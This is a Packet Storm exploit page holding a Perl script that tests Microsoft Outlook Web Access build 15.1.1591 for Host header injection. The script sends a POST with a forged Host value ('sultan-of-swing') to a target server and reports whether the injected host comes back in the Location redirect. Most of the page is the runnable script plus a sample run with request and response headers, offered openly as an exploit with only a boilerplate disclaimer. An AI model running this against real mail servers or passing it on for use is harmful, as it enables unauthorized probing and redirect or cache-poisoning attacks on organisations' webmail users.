what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Microsoft Outlook Web Access Build 15.1.1591 Header Injection

Microsoft Outlook Web Access Build 15.1.1591 Header Injection
Posted Sep 2, 2019
Authored by Todor Donev

Microsoft Outlook Web Access build 15.1.1591 suffers from a remote host header injection vulnerability.

tags | exploit, remote, web
SHA-256 | 3851e7b6f8702511bfebd9d28508518b1088e01005f6b566164e025598a95b29
Download | Favorite | View

Microsoft Outlook Web Access Build 15.1.1591 Header Injection

Change Mirror Download
#!/usr/bin/perl -w
#
#  Microsoft Outlook Web Access build:15.1.1591 Remote Header 'Host' Injection Exploit
#
#  Copyright 2019 (c) Todor Donev <todor.donev at gmail.com>
#
#
#  Disclaimer:
#  This or previous programs are for Educational purpose ONLY. Do not use it without permission. 
#  The usual disclaimer applies, especially the fact that Todor Donev is not liable for any damages 
#  caused by direct or indirect use of the  information or functionality provided by these programs. 
#  The author or any Internet provider  bears NO responsibility for content or misuse of these programs 
#  or any derivatives thereof. By using these programs you accept the fact  that any damage (dataloss, 
#  system crash, system compromise, etc.) caused by the use  of these programs are not Todor Donev's 
#  responsibility.
#   
#  Use them at your own risk!
#
#   [test@localhost microsoft_owa]$ perl microsoft_owa.pl https://133.71.33.37/
#   [+] Microsoft Outlook Web Access build:15.1.1591 Remote Header 'Host' Injection Exploit
#   =======================================================================================
#   [!] Author: Todor Donev <todor.donev@gmail.com>
#   =======================================================================================
#   [+] >  Host: sultan-of-swing
#   [+] >  User-Agent: Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.6) Gecko/20040406 Galeon/1.3.15
#   [+] >  Content-Type: application/x-www-form-urlencoded
#   [+] <  Cache-Control: no-cache
#   [+] <  Connection: close
#   [+] <  Date: Sat, 31 Aug 0000 13:37:00 GMT
#   [+] <  Pragma: no-cache
#   [+] <  Location: https://sultan-of-swing/owa/
#   [+] <  Server: Microsoft-IIS/10.0
#   [+] <  Content-Length: 0
#   [+] <  Client-Date: Sat, 31 Aug 0000 13:37:00 GMT
#   [+] <  Client-Peer: 133.71.33.37:443
#   [+] <  Client-Response-Num: 1
#   [+] <  Client-SSL-Cert-Issuer: CENSORED
#   [+] <  Client-SSL-Cert-Subject: CENSORED
#   [+] <  Client-SSL-Cipher: ECDHE-RSA-AES128-GCM-SHA256
#   [+] <  Client-SSL-Socket-Class: IO::Socket::SSL
#   [+] <  Client-SSL-Warning: Peer certificate not verified
#   [+] <  X-FEServer: MAILSVRTEST
#   [+] <  X-RequestId: CENSORED
#  =======================================================================================
#   [+] Microsoft OWA Location is Injected => https://sultan-of-swing/owa/
#
#  Description:
#  OWASP Testing for HTTP Splitting/Smuggling (OTG-INPVAL-016)
#  https://www.owasp.org/index.php/Testing_for_HTTP_Splitting/Smuggling_(OTG-INPVAL-016)
#
#

use strict;
use v5.10;
use HTTP::Request;
use LWP::UserAgent;
use WWW::UserAgent::Random;


my $host = shift || 'https://192.168.1.1:443/';

printf ("[+] Microsoft Outlook Web Access build:15.1.1591 Remote Header 'Host' Injection Exploit\n");
printf ("=======================================================================================\n");
printf ("[!] Author: Todor Donev <todor.donev\@gmail.com>\n");
printf ("[?] e.g. perl $0 https://target:port/\n") and exit if ($host !~ m/^http/);

my $user_agent = rand_ua("browsers");
my $browser  = LWP::UserAgent->new(
                                        protocols_allowed => ['http', 'https'],
                                        ssl_opts => { verify_hostname => 0 }
                                );
   $browser->timeout(10);
   $browser->agent($user_agent);

my $request = HTTP::Request->new (POST => $host,
                                  [ Content_Type => "application/x-www-form-urlencoded" ,
                  Host => "sultan-of-swing"], " ");
printf ("=======================================================================================\n");
my $response = $browser->request($request);
if ($response->header('Location') =~ m/sultan-of-swing/i){

  say "[+] >  $_: ", $request->header($_) for  $request->header_field_names;
  say "[+] <  $_: ", $response->header($_) for  $response->header_field_names;
  printf ("=======================================================================================\n")
  printf ("[+] Microsoft OWA Location is Injected => %s\n", $response->header('Location'));
  exit;

} else {

  printf ("[-] Exploit failed!\n");
  exit;

}
Login or Register to add favorites

File Archive:

June 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jun 1st
    0 Files
  • 2
    Jun 2nd
    0 Files
  • 3
    Jun 3rd
    18 Files
  • 4
    Jun 4th
    21 Files
  • 5
    Jun 5th
    0 Files
  • 6
    Jun 6th
    57 Files
  • 7
    Jun 7th
    0 Files
  • 8
    Jun 8th
    0 Files
  • 9
    Jun 9th
    0 Files
  • 10
    Jun 10th
    0 Files
  • 11
    Jun 11th
    0 Files
  • 12
    Jun 12th
    0 Files
  • 13
    Jun 13th
    0 Files
  • 14
    Jun 14th
    0 Files
  • 15
    Jun 15th
    0 Files
  • 16
    Jun 16th
    0 Files
  • 17
    Jun 17th
    0 Files
  • 18
    Jun 18th
    0 Files
  • 19
    Jun 19th
    0 Files
  • 20
    Jun 20th
    0 Files
  • 21
    Jun 21st
    0 Files
  • 22
    Jun 22nd
    0 Files
  • 23
    Jun 23rd
    0 Files
  • 24
    Jun 24th
    0 Files
  • 25
    Jun 25th
    0 Files
  • 26
    Jun 26th
    0 Files
  • 27
    Jun 27th
    0 Files
  • 28
    Jun 28th
    0 Files
  • 29
    Jun 29th
    0 Files
  • 30
    Jun 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Site Links
News by Month
News Tags
Files by Month
File Tags
File Directory
About Us
History & Purpose
Contact Information
Terms of Service
Privacy Statement
Copyright Information
Services
Security Services
Hosting By
Rokasec
close